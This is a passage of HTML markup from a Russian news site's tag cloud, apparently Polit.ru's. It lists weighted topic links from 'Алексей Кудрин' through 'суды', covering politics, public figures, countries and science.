  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksej-kudrin/" class="weight3">Алексей Кудрин</a>
  

  

  

  

  

  
  <a href="/tag/alexey_navalny/" class="weight9">Алексей Навальный</a>
  

  

  

  

  

  
  <a href="/tag/aleksej-ulyukaev/" class="weight6">Алексей Улюкаев</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/alcohol/" class="weight7">алкоголь</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/amnisty/" class="weight6">амнистия</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/anatolij-serdyukov/" class="weight6">Анатолий Сердюков</a>
  

  

  

  

  

  
  <a href="/tag/angela-merkel/" class="weight8">Ангела Меркель</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/antimajdan/" class="weight10 force-hi">Антимайдан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/armeniya/" class="weight7">Армения</a>
  

  
  <a href="/tag/army/" class="weight10 force-hi">армия</a>
  

  

  

  

  
  <a href="/tag/arsenij-yacenyuk/" class="weight8">Арсений Яценюк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/archeology/" class="weight8">археология</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/astronomy_topic/" class="weight8">астрономия</a>
  

  

  

  

  

  

  
  <a href="/tag/nuclear_energy/" class="weight10 force-hi">атомная энергия</a>
  

  

  

  

  

  

  
  <a href="/tag/afganistan/" class="weight8">Афганистан</a>
  

  

  

  

  
  <a href="/tag/aeroflot/" class="weight7">Аэрофлот</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mezhkontinentalnye-ballisticheskie-rakety/" class="weight5">баллистические ракеты</a>
  

  

  

  

  

  
  <a href="/tag/bankovskij-sektor/" class="weight10 force-hi">банковский сектор</a>
  

  
  <a href="/tag/bankrotstvo/" class="weight5">банкротство</a>
  

  
  <a href="/tag/barak-obama/" class="weight10">Барак Обама</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/bashar-asad/" class="weight7">Башар Асад</a>
  

  
  <a href="/tag/bashkiriya/" class="weight4">Башкирия</a>
  

  

  
  <a href="/tag/bezhency/" class="weight8">беженцы</a>
  

  

  

  

  

  

  
  <a href="/tag/Belarus/" class="weight9">Белоруссия</a>
  

  

  

  
  <a href="/tag/belgiya/" class="weight7">Бельгия</a>
  

  

  

  

  

  
  <a href="/tag/besporyadki/" class="weight9">беспорядки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/biznes/" class="weight8">бизнес</a>
  

  

  

  

  
  <a href="/tag/biology/" class="weight10">биология </a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/izr/" class="weight9">ближневосточный конфликт</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boks/" class="weight5">бокс</a>
  

  

  
  <a href="/tag/football_fans/" class="weight7">болельщики</a>
  

  

  

  
  <a href="/tag/bolotnoe-delo/" class="weight8">«болотное дело»</a>
  

  

  

  

  
  <a href="/tag/bolshoj-tennis/" class="weight5">большой теннис</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boris-nemcov/" class="weight8">Борис Немцов</a>
  

  

  

  

  

  

  

  
  <a href="/tag/braziliya/" class="weight8">Бразилия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/velikaya-otechestvennaya-vojna/" class="weight7">Великая Отечественная война</a>
  

  

  
  <a href="/tag/UK/" class="weight10 force-hi">Великобритания</a>
  

  

  

  
  <a href="/tag/venesuela/" class="weight7">Венесуэла</a>
  

  

  

  

  

  

  
  <a href="/tag/verhovnaya-rada/" class="weight9">Верховная Рада</a>
  

  
  <a href="/tag/verhovnyj-sud/" class="weight6">Верховный суд</a>
  

  

  

  
  <a href="/tag/vzryv/" class="weight10">взрыв</a>
  

  
  <a href="/tag/bribe/" class="weight8">взятка</a>
  

  
  <a href="/tag/videon_lectures/" class="weight6">видеозаписи публичных лекций «Полит.ру»</a>
  

  
  <a href="/tag/video/" class="weight9">видео «Полит.ру»</a>
  

  

  

  
  <a href="/tag/vizovyj-rezhim/" class="weight7">визовый режим</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/viktor-yanukovich/" class="weight8">Виктор Янукович</a>
  

  

  

  
  <a href="/tag/virus/" class="weight6 force-hi">вирусы</a>
  

  

  

  

  
  <a href="/tag/vitalij-mutko/" class="weight7">Виталий Мутко</a>
  

  

  

  

  

  
  <a href="/tag/vkontakte/" class="weight7">«ВКонтакте»</a>
  

  
  <a href="/tag/airborne/" class="weight8">ВКС</a>
  

  
  <a href="/tag/vladivostok/" class="weight5">Владивосток</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-zhirinovskij/" class="weight5">Владимир Жириновский</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-putin/" class="weight12 force-hi">Владимир Путин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vmf/" class="weight8">ВМФ</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/air_force/" class="weight9">военная авиация</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/volgograd/" class="weight5">Волгоград</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vtoraya-mirovaya-vojna/" class="weight6">Вторая мировая война</a>
  

  

  
  <a href="/tag/vuzy/" class="weight7">вузы</a>
  

  

  

  
  <a href="/tag/vybory/" class="weight11 force-hi">выборы</a>
  

  
  <a href="/tag/vybory-gubernatorov/" class="weight6">выборы губернаторов</a>
  

  
  <a href="/tag/vybory-mera-moskvy/" class="weight7">выборы мэра Москвы</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/gazovaya-promyshlennost/" class="weight9">газовая промышленность</a>
  

  

  

  
  <a href="/tag/gazprom/" class="weight10">«Газпром»</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genetics/" class="weight7">генетика</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genprokuratura/" class="weight9">Генпрокуратура</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/germaniya/" class="weight10">Германия</a>
  

  

  

  

  
  <a href="/tag/gibdd/" class="weight7">ГИБДД</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/hollywood/" class="weight5">Голливуд</a>
  

  

  

  
  <a href="/tag/homosexuality/" class="weight5">гомосексуализм</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/gosbyudzhet/" class="weight9">госбюджет</a>
  

  
  <a href="/tag/gosdep/" class="weight7">Госдеп</a>
  

  
  <a href="/tag/gosduma/" class="weight11 force-hi">Госдума</a>
  

  
  <a href="/tag/goszakupki/" class="weight4">госзакупки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/grazhdanskaya-aviaciya/" class="weight11 force-hi">гражданская авиация</a>
  

  

  

  

  
  <a href="/tag/greece/" class="weight9">Греция</a>
  

  

  

  

  

  
  <a href="/tag/greenpeace/" class="weight6">Гринпис</a>
  

  

  

  

  
  <a href="/tag/georgia/" class="weight10 force-hi">Грузия</a>
  

  

  

  

  
  <a href="/tag/gumanitarnaya-pomosh/" class="weight5">гуманитарная помощь</a>
  

  
  <a href="/tag/liberal_arts/" class="weight8">гуманитарные и социальные  науки</a>
  

  

  

  

  

  
  <a href="/tag/dagestan/" class="weight9">Дагестан</a>
  

  

  
  <a href="/tag/dalnij-vostok/" class="weight7">Дальний Восток</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dengi/" class="weight6">деньги</a>
  

  

  
  <a href="/tag/den-pobedy/" class="weight6">День Победы</a>
  

  

  

  
  <a href="/tag/deti/" class="weight9">дети</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dmitriy_medvedev/" class="weight10 force-hi">Дмитрий Медведев</a>
  

  

  
  <a href="/tag/dmitrij-peskov/" class="weight9">Дмитрий Песков</a>
  

  
  <a href="/tag/dmitrij-rogozin/" class="weight7">Дмитрий Рогозин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dollar/" class="weight9">доллар</a>
  

  

  

  

  

  
  <a href="/tag/domodedovo/" class="weight6">Домодедово</a>
  

  
  <a href="/tag/donald-tramp/" class="weight6">Дональд Трамп</a>
  

  

  
  <a href="/tag/doneck/" class="weight11 force-hi">Донецк</a>
  

  

  
  <a href="/tag/doping/" class="weight8">допинг</a>
  

  
  <a href="/tag/russian_roads/" class="weight5">дороги России</a>
  

  

  
  <a href="/tag/draka/" class="weight7">драка</a>
  

  

  

  

  
  <a href="/tag/dtp/" class="weight10 force-hi">ДТП</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/evgeniya-vasileva/" class="weight7">Евгения Васильева</a>
  

  

  

  
  <a href="/tag/evro/" class="weight9">евро</a>
  

  

  

  

  
  <a href="/tag/evrokomissiya/" class="weight3">Еврокомиссия</a>
  

  
  <a href="/tag/evromajdan/" class="weight10">Евромайдан</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/EU/" class="weight11 force-hi">Евросоюз</a>
  

  
  <a href="/tag/egipet/" class="weight9">Египет</a>
  

  

  
  <a href="/tag/obraz/" class="weight9">ЕГЭ</a>
  

  
  <a href="/tag/edinaya-rossiya/" class="weight9">«Единая Россия»</a>
  

  

  

  

  
  <a href="/tag/ekaterinburg/" class="weight7">Екатеринбург</a>
  

  

  

  

  

  

  

  
  <a href="/tag/espch/" class="weight2">ЕСПЧ</a>
  

  
  <a href="/tag/natural_sciences/" class="weight8 force-hi macrotag">естественные и точные науки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/zhkh/" class="weight8">ЖКХ</a>
  

  

  

  
  <a href="/tag/zhurnalisty/" class="weight9">журналисты</a>
  

  

  

  

  
  <a href="/tag/foreign_agents_law/" class="weight7">закон об «иностранных агентах»</a>
  

  

  
  <a href="/tag/zakonotvorchestvo/" class="weight10 force-hi">законотворчество</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/healthcare_russia/" class="weight7">здравоохранение в России</a>
  

  

  
  <a href="/tag/zemletryasenie/" class="weight8">землетрясение</a>
  

  

  
  <a href="/tag/zenit/" class="weight6">«Зенит»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/israel/" class="weight9">Израиль</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/India/" class="weight8">Индия</a>
  

  
  <a href="/tag/indonesia/" class="weight6">Индонезия</a>
  

  

  
  <a href="/tag/innovation/" class="weight7">инновации</a>
  

  

  

  

  

  

  
  <a href="/tag/science_interview/" class="weight5">Интервью ученых</a>
  

  
  <a href="/tag/internet/" class="weight10 force-hi">интернет</a>
  

  

  
  <a href="/tag/inflation/" class="weight6">инфляция</a>
  

  

  

  

  

  
  <a href="/tag/irak/" class="weight9">Ирак</a>
  

  

  
  <a href="/tag/iraqafterwar/" class="weight9">Ирак после войны</a>
  

  
  <a href="/tag/iran/" class="weight9">Иран</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/irkutskaya-oblast/" class="weight7">Иркутская область</a>
  

  

  

  

  
  <a href="/tag/islam/" class="weight8">ислам</a>
  

  

  
  <a href="/tag/islamskoe-gosudarstvo-iraka-i-levanta/" class="weight10 force-hi">«Исламское государство»</a>
  

  

  
  <a href="/tag/spain/" class="weight8">Испания</a>
  

  

  

  

  
  <a href="/tag/history/" class="weight9">история</a>
  

  

  

  

  

  
  <a href="/tag/istoria/" class="weight6">История человечества</a>
  

  
  <a href="/tag/italy/" class="weight8">Италия</a>
  

  

  

  

  
  <a href="/tag/jemen/" class="weight6">Йемен</a>
  

  

  

  

  

  

  
  <a href="/tag/kazan/" class="weight7">Казань</a>
  

  
  <a href="/tag/kazahstan/" class="weight8">Казахстан</a>
  

  

  

  

  
  <a href="/tag/kazn/" class="weight5">казнь</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kamchatka/" class="weight4">Камчатка</a>
  

  
  <a href="/tag/canada/" class="weight8">Канада</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kiev/" class="weight9">Киев</a>
  

  

  

  

  
  <a href="/tag/kino/" class="weight10">кино</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/china/" class="weight10">Китай</a>
  

  

  

  

  
  <a href="/tag/climate/" class="weight6">Климат Земли, атмосферные явления</a>
  

  

  

  

  
  <a href="/tag/kndr/" class="weight9">КНДР</a>
  

  

  
  <a href="/tag/books/" class="weight4">Книга. Знание</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/comp/" class="weight4">Компьютеры, программное обеспечение</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/korablekrushenie/" class="weight7">кораблекрушение</a>
  

  

  

  

  

  
  <a href="/tag/corruption/" class="weight10 force-hi">коррупция</a>
  

  

  

  

  
  <a href="/tag/vosto/" class="weight5">космодром Восточный</a>
  

  

  

  

  

  
  <a href="/tag/space/" class="weight10 force-hi">космос</a>
  

  

  

  

  
  <a href="/tag/kprf/" class="weight7">КПРФ</a>
  

  
  <a href="/tag/theft/" class="weight7">кража</a>
  

  

  

  

  

  
  <a href="/tag/krasnodarskij-kraj/" class="weight7">Краснодарский край</a>
  

  

  
  <a href="/tag/krasnoyarskij-kraj/" class="weight5">Красноярский край</a>
  

  

  

  
  <a href="/tag/debts/" class="weight9">кредиты</a>
  

  
  <a href="/tag/kreml/" class="weight8">Кремль</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/helicopter_crush/" class="weight6">крушение вертолета</a>
  

  

  

  

  
  <a href="/tag/krym/" class="weight11 force-hi">Крым</a>
  

  

  
  <a href="/tag/krymskij-krizis/" class="weight9">крымский кризис</a>
  

  

  
  <a href="/tag/kuba/" class="weight5">Куба</a>
  

  

  

  
  <a href="/tag/kultura/" class="weight7 force-hi">культура</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/latviya/" class="weight7">Латвия</a>
  

  

  

  

  
  <a href="/tag/lgbt/" class="weight7">ЛГБТ</a>
  

  
  <a href="/tag/ldpr/" class="weight7">ЛДПР</a>
  

  

  

  

  

  

  

  
  <a href="/tag/legkaya-atletika/" class="weight5">легкая атлетика</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/lesnye-pozhary/" class="weight6">лесные пожары</a>
  

  

  

  

  

  

  

  
  <a href="/tag/liviya/" class="weight6">Ливия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/lithuania/" class="weight6">Литва</a>
  

  
  <a href="/tag/literatura/" class="weight7">литература</a>
  

  

  

  

  

  

  
  <a href="/tag/london/" class="weight6">Лондон</a>
  

  

  

  
  <a href="/tag/lugansk/" class="weight10">Луганск</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/malajziya/" class="weight7">Малайзия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mvd/" class="weight10">МВД</a>
  

  
  <a href="/tag/imf/" class="weight6">МВФ</a>
  

  

  

  

  

  

  
  <a href="/tag/media/" class="weight10">медиа</a>
  

  
  <a href="/tag/medicine/" class="weight10 force-hi">медицина</a>
  

  

  
  <a href="/tag/interdisciplinary_research/" class="weight0 force-hi macrotag">междисциплинарные исследования</a>
  

  

  

  

  

  
  <a href="/tag/meksika/" class="weight7">Мексика</a>
  

  

  

  
  <a href="/tag/memoriya/" class="weight9">Мемория</a>
  

  

  

  

  
  <a href="/tag/metro/" class="weight9">метро</a>
  

  

  

  

  

  
  <a href="/tag/gastarbeiter/" class="weight9">мигранты</a>
  

  
  <a href="/tag/mid-rossii/" class="weight10">МИД России</a>
  

  

  

  

  
  <a href="/tag/minzdrav/" class="weight6">Минздрав</a>
  

  

  

  
  <a href="/tag/minkomsvyazi/" class="weight5">Минкомсвязи</a>
  

  
  <a href="/tag/minkult/" class="weight7">Минкульт</a>
  

  
  <a href="/tag/minoborony/" class="weight10 force-hi">Минобороны</a>
  

  
  <a href="/tag/minobrnauki/" class="weight7">Минобрнауки</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mintrud/" class="weight5">Минтруд</a>
  

  
  <a href="/tag/minfin/" class="weight9">Минфин</a>
  

  
  <a href="/tag/minekonomrazvitiya/" class="weight8">Минэкономразвития</a>
  

  

  
  <a href="/tag/minjust/" class="weight7">Минюст</a>
  

  
  <a href="/tag/crisis/" class="weight10">мировой экономический кризис</a>
  

  

  
  <a href="/tag/mistral/" class="weight5">«Мистраль»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mihail-saakashvili/" class="weight7">Михаил Саакашвили</a>
  

  

  

  

  

  
  <a href="/tag/mihail-hodorkovskij/" class="weight7">Михаил Ходорковский</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/iss/" class="weight9">МКС</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/moldaviya/" class="weight6">Молдавия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mosgorsud/" class="weight7">Мосгорсуд</a>
  

  

  
  <a href="/tag/moskva/" class="weight12 force-hi">Москва</a>
  

  

  

  
  <a href="/tag/moskovskaya-oblast/" class="weight10">Московская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/moshennichestvo/" class="weight9">мошенничество</a>
  

  

  

  

  

  

  

  
  <a href="/tag/music/" class="weight9">музыка</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mchs/" class="weight9">МЧС</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/navodnenie/" class="weight7">наводнение</a>
  

  

  

  
  <a href="/tag/nadezhda-savchenko/" class="weight8">Надежда Савченко</a>
  

  

  

  
  <a href="/tag/nalogi/" class="weight8">налоги</a>
  

  

  

  

  
  <a href="/tag/nanotechnology_topic/" class="weight7">нанотехнологии</a>
  

  
  <a href="/tag/drugs/" class="weight9">наркотики</a>
  

  

  

  

  
  <a href="/tag/nasa/" class="weight5 force-hi">НАСА</a>
  

  

  

  

  

  
  <a href="/tag/nauka/" class="weight7">наука</a>
  

  

  
  <a href="/tag/science_ru/" class="weight10">Наука в современной России</a>
  

  

  

  
  <a href="/tag/naftogaz-ukrainy/" class="weight8">«Нафтогаз Украины»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nko/" class="weight4">некоммерческие организации</a>
  

  
  <a href="/tag/nekrolog/" class="weight8">некролог</a>
  

  

  

  

  

  
  <a href="/tag/bunt/" class="weight3">Нерусский бунт</a>
  

  
  <a href="/tag/oil/" class="weight10">нефть</a>
  

  

  
  <a href="/tag/nigeria/" class="weight6">Нигерия</a>
  

  
  <a href="/tag/netherlands/" class="weight8">Нидерланды</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/Nobel_prize/" class="weight6 force-hi">Нобелевская премия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/novosibirsk/" class="weight7">Новосибирск</a>
  

  

  

  
  <a href="/tag/newtech/" class="weight8">Новые технологии, инновации</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/new-york/" class="weight5">Нью-Йорк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/oboronservis/" class="weight8">«Оборонсервис»</a>
  

  

  
  <a href="/tag/niu/" class="weight9">образование</a>
  

  

  

  
  <a href="/tag/obse/" class="weight8">ОБСЕ</a>
  

  

  

  

  

  
  <a href="/tag/obshestvennyj-transport/" class="weight6">общественный транспорт</a>
  

  
  <a href="/tag/society/" class="weight0 force-hi macrotag">общество</a>
  

  

  

  

  
  <a href="/tag/robbery/" class="weight8">ограбление</a>
  

  

  

  
  <a href="/tag/odessa/" class="weight7">Одесса</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/olympics/" class="weight9">Олимпийские игры</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/UN/" class="weight9">ООН</a>
  

  

  

  

  

  
  <a href="/tag/oppoziciya/" class="weight8">оппозиция</a>
  

  
  <a href="/tag/oprosy/" class="weight10">опросы</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/arms/" class="weight9">оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/otstavki-naznacheniya/" class="weight9">отставки-назначения</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pakistan/" class="weight7">Пакистан</a>
  

  

  
  <a href="/tag/palestinskaya-avtonomiya/" class="weight6">Палестинская автономия</a>
  

  

  

  

  

  

  
  <a href="/tag/pope/" class="weight2">Папа Римский</a>
  

  

  

  

  
  <a href="/tag/paris/" class="weight8">Париж</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pensionnaya-reforma/" class="weight8">пенсионная реформа</a>
  

  
  <a href="/tag/pentagon/" class="weight7">Пентагон</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/petr-poroshenko/" class="weight10">Петр Порошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pogranvojska/" class="weight6">погранвойска</a>
  

  

  

  

  
  <a href="/tag/pozhar/" class="weight10">пожар</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/police/" class="weight10 force-hi">полиция</a>
  

  

  

  

  
  <a href="/tag/polsha/" class="weight8">Польша</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kidnapping/" class="weight3">похищение</a>
  

  

  

  

  

  
  <a href="/tag/human_rights/" class="weight2">права человека</a>
  

  
  <a href="/tag/pravitelstvo/" class="weight10">правительство</a>
  

  

  
  <a href="/tag/pravo/" class="weight9">Право</a>
  

  

  
  <a href="/tag/human_rights_movement/" class="weight6">правозащитное движение</a>
  

  

  
  <a href="/tag/pravyj-sektor/" class="weight6">«Правый сектор»</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/acab/" class="weight6">преступления полицейских</a>
  

  
  <a href="/tag/prestupnost/" class="weight9">преступность</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/primorskij-kraj/" class="weight6">Приморский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/incidents/" class="weight10 force-hi">происшествия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/publ_lect/" class="weight8">публичные лекции</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/ramzan-kadyrov/" class="weight8">Рамзан Кадыров</a>
  

  
  <a href="/tag/AOS/" class="weight7">РАН</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kyrgyzstan/" class="weight7">Революция в Киргизии</a>
  

  
  <a href="/tag/redzhep-erdogan/" class="weight7">Реджеп Эрдоган</a>
  

  

  

  

  
  <a href="/tag/rejtingi/" class="weight8">рейтинги</a>
  

  

  

  
  <a href="/tag/religiya/" class="weight8">религия</a>
  

  

  

  

  

  
  <a href="/tag/army_topic/" class="weight4">Реформа армии</a>
  

  

  

  
  <a href="/tag/rzhd/" class="weight8">РЖД</a>
  

  

  

  

  

  

  

  
  <a href="/tag/ritejl/" class="weight5">ритейл</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/roskomnadzor/" class="weight8">Роскомнадзор</a>
  

  
  <a href="/tag/roskosmos/" class="weight8">Роскосмос</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rospotrebnadzor/" class="weight8">Роспотребнадзор</a>
  

  

  

  

  
  <a href="/tag/rosselhoznadzor/" class="weight6">Россельхознадзор</a>
  

  
  <a href="/tag/rossijskaya-akademiya-nauk/" class="weight8">Российская академия наук</a>
  

  

  

  

  

  

  

  
  <a href="/tag/Russia/" class="weight12 force-hi">Россия</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rostov-na-donu/" class="weight5">Ростов-на-Дону</a>
  

  
  <a href="/tag/rostovskaya-oblast/" class="weight7">Ростовская область</a>
  

  

  

  

  

  
  <a href="/tag/rpc/" class="weight8">РПЦ</a>
  

  

  

  
  <a href="/tag/rubl/" class="weight9">рубль</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/russian_nationalists/" class="weight6">русские националисты</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/rfs/" class="weight5">РФС</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/st_petersburgh/" class="weight10">Санкт-Петербург</a>
  

  
  <a href="/tag/sankcii/" class="weight10 force-hi">санкции</a>
  

  

  

  

  

  
  <a href="/tag/saudi_arabia/" class="weight7">Саудовская Аравия</a>
  

  
  <a href="/tag/sahalin/" class="weight3">Сахалин</a>
  

  

  
  <a href="/tag/sberbank/" class="weight7">Сбербанк</a>
  

  

  
  <a href="/tag/sverdlovskaya-oblast/" class="weight6">Свердловская область</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/communications/" class="weight7">связь</a>
  

  
  <a href="/tag/telecom/" class="weight9">связь и телекоммуникации</a>
  

  
  <a href="/tag/sevastopol/" class="weight7">Севастополь</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/selskoe-hozyajstvo/" class="weight7">сельское хозяйство</a>
  

  

  

  
  <a href="/tag/separatizm/" class="weight10">сепаратизм</a>
  

  
  <a href="/tag/serbiya/" class="weight4">Сербия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-lavrov/" class="weight9">Сергей Лавров</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-sobyanin/" class="weight7">Сергей Собянин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sergey-shoigu/" class="weight7">Сергей Шойгу</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/siriya/" class="weight11 force-hi">Сирия</a>
  

  

  

  

  

  

  
  <a href="/tag/skolkovo/" class="weight8">Сколково</a>
  

  

  

  
  <a href="/tag/slavyansk/" class="weight7">Славянск</a>
  

  

  
  <a href="/tag/committee_of_inquiry/" class="weight10 force-hi">Следственный комитет</a>
  

  
  <a href="/tag/sledstvie/" class="weight9">следствие</a>
  

  

  

  

  

  
  <a href="/tag/mass_media/" class="weight4">СМИ</a>
  

  

  

  

  

  
  <a href="/tag/sovbez-oon/" class="weight7">Совбез ООН</a>
  

  

  

  

  
  <a href="/tag/sovet-federacii/" class="weight9">Совет Федерации</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sotovaya-svyaz/" class="weight5">сотовая связь</a>
  

  

  

  
  <a href="/tag/social_network/" class="weight8">социальные сети</a>
  

  

  
  <a href="/tag/sociology/" class="weight5">социология</a>
  

  
  <a href="/tag/sociology_russia/" class="weight7">Социология в России</a>
  

  

  
  <a href="/tag/sochi/" class="weight7">Сочи</a>
  

  
  <a href="/tag/sochi_olympics/" class="weight9">Сочи 2014</a>
  

  

  

  

  

  
  <a href="/tag/spartak/" class="weight6">«Спартак»</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/spravedlivaya-rossiya/" class="weight7">«Справедливая Россия»</a>
  

  
  <a href="/tag/sputnik/" class="weight8 force-hi">спутники</a>
  

  

  

  

  
  <a href="/tag/ussr_topic/" class="weight8">СССР</a>
  

  
  <a href="/tag/stavropolskij-kraj/" class="weight6">Ставропольский край</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/stihijnye-bedstviya/" class="weight8">стихийные бедствия</a>
  

  
  <a href="/tag/stix/" class="weight7">Стихотворения на случай</a>
  

  

  

  
  <a href="/tag/strahovanie/" class="weight3">страхование</a>
  

  
  <a href="/tag/strelba/" class="weight9">стрельба</a>
  

  

  

  

  
  <a href="/tag/building/" class="weight6">строительство</a>
  

  

  

  

  

  

  
  <a href="/tag/courts/" class="weight11 force-hi">суды</a>
  

  
